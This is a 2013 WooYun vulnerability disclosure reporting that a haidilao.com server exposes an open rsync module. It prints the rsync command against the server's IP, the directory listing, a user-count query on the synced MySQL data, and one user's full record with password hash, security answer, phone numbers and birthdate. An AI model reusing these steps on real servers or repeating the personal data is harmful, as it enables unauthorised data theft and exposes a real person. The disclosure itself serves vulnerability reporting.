当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041636

漏洞标题:系统配置不当敏感信息泄漏

相关厂商:haidilao.com

漏洞作者: 盈盈无绪

提交时间:2013-11-01 19:01

修复时间:2013-12-16 19:02

公开时间:2013-12-16 19:02

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-01: 细节已通知厂商并且等待厂商处理中
2013-11-03: 厂商已经确认,细节仅向厂商公开
2013-11-13: 细节向核心白帽子及相关领域专家公开
2013-11-23: 细节向普通白帽子公开
2013-12-03: 细节向实习白帽子公开
2013-12-16: 细节向公众公开

简要描述:

系统配置不当,敏感信息泄漏

详细说明:

rsync  114.247.120.160::data/
drwx------ 4096 2013/10/30 11:04:31 .
-rwx------ 4 2013/10/25 23:55:26 cm_seed.data
drwx------ 4096 2012/11/30 04:53:05 00
drwx------ 4096 2012/11/30 05:40:27 batch
drwx------ 4096 2012/11/30 05:40:27 cleanup
drwx------ 4096 2012/11/30 05:40:28 lost+found
drwx------ 4096 2013/07/19 18:45:29 mysql
drwx------ 4096 2012/11/30 05:55:58 netfolder
drwx------ 4096 2012/11/30 05:55:58 search
drwx------ 4096 2012/11/30 06:20:31 ud


同步mysql内容回来看一下有邮件相关信息。

select count(*) from cm_user_info;
+----------+
| count(*) |
+----------+
| 2451 |
+----------+
1 row in set (0.00 sec)
2千多用户信息
| 1 | a | liuy | 1_liuy####_01_100000lx | {enc2}db77b4b806c0a76476ca824af7221bf5 | 我最爱的是谁 | 我最爱的是谢英 | NULL | 刘扬-工程管理部-安全组-巡检员 | 18601124408 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | 1974-09-04 | NULL | 18910071182 | NULL | NULL | f_11u5yl5iaml@liuy@hai | NULL |


漏洞证明:

hdl.png


数据库应该是2012年底被弃用了,但是用户信息依然有效。

修复方案:

你们懂得

版权声明:转载请注明来源 盈盈无绪@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-11-03 09:09

厂商回复:

该漏洞已经通知相关技术人员进行修复,感谢您的提报

最新状态:

暂无


漏洞评价:

评论